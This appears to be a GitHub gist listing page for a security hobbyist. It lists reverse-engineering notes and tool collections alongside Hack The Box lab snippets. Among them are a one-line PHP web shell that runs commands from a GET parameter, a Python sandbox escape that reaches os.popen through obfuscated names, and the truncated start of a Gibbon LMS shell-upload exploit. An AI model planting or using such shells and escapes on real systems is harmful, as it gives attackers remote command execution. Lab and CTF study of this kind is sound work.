Skip to content

Instantly share code, notes, and snippets.

View sharpicx's full-sized avatar
🚬

sharpicx

🚬
View GitHub Profile
@sharpicx
sharpicx / reverse-engineering-golang.md
Created August 15, 2025 13:15 — forked from 0xdevalias/reverse-engineering-golang.md
Some notes, tools, and techniques for reverse engineering Golang binaries
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

Reverse-Engineering-toolkit

  • Reverse Engineering Resource Collection. 3500+ open source tools, 2300+ blog posts.

Directory

After IDA Pro

This repo contains information about what to do after installing IDA Pro v8.3 and above.

UPDATE: The plugins I have curated here might had not updated/ported for IDA Pro v9.0. I am going to update this repo when a plugin is ready to get used in new ID pro v9. Stay tuned.

[scrolling]
history = 10000
multiplier = 3
[colors]
draw_bold_text_with_bright_colors = true
[colors.primary]
background = "#000000"
foreground = "#ffffff"
@sharpicx
sharpicx / README.md
Created June 20, 2025 07:51
obfuscated php shell

Simple PHP Web Shell

Simple HTTP Requests GET Method Shell

<?=`$_GET[0]`?>

[*] Usage: http://target.com/path/to/shell.php?0=command
@sharpicx
sharpicx / cypher.http
Created June 6, 2025 20:43
HTB: Cypher
POST /api/auth HTTP/1.1
Host: cypher.htb
Content-Length: 303
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept: */*
DNT: 1
Content-Type: application/json
Origin: http://cypher.htb
Referer: http://cypher.htb/login
@sharpicx
sharpicx / 1.py
Created June 6, 2025 20:42
HTB: Code
g = run_code.__globals__
m = g["s"+"ys"].modules
o = m["o"+"s"]
p = getattr(o, "p"+"o"+"pen")
c = p("id")
for x in c: print(x)
@sharpicx
sharpicx / a.py
Created June 6, 2025 20:40
HTB: TheFrizz
import requests
import sys
import base64
TARGET = "http://frizzdc.frizz.htb"
UPLOAD_PATH = "/Gibbon-LMS/modules/Rubrics/rubrics_visualise_saveAjax.php"
SHELL_PATH = "/Gibbon-LMS/modules/Rubrics/rscreenshot_123456890.php"
COOKIE = {'G60fa1cd0af7be78b': '1vka2pu1otv1l3nnj5m0uugdsv'}
def generate_payload(cmd_param='1'):